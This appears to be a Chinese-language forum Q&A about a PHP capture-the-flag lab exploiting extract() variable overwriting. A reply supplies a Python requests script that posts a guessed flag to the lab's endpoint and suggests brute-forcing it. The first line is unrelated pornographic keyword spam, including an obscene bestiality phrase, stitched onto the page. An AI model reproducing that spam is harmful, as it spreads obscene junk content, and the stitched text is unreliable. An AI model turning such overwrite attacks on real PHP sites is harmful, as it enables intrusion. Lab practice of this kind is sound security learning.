青娱乐国产,中国女人与动人物牲交,国产爱豆剧传媒在线观看

按照視頻講解，傳入aurora&flag參數，無法獲得flag

mb_ypixobsb 2025-4-1 152

源自：視頻：2-10 世界上最好語言：PHP基本漏洞分析與實操講解-exps-extract

http://d45462f4-ee6c-40fa-9377-c3062e480314.node.pediy.com:81/extract.php/?aurora&flag

1條回答

四葉草不幸運 2025-4-9

可以參考我寫的，使用post請求

import requests
 
url = "http://cbc416fc-215d-4a97-be1b-d3116b3885f2.node.pediy.com:81/extract.php"
 
# 不覆蓋 $flag，讓其使用默認值（由 extract_flag.php 提供）
params = {
    "aurora": ""  # 占個位，先觸發(fā) isset
}
 
# 關鍵！發(fā)送 POST 內容：內容必須等于 flag 文件的內容
# 我們先猜測真實 flag 內容（不行就爆破）
response = requests.post(url, params=params, data="ctf{YOU_4re_DO1ng_GREAT!}", verify=False)
print("響應內容：")
print(response.text)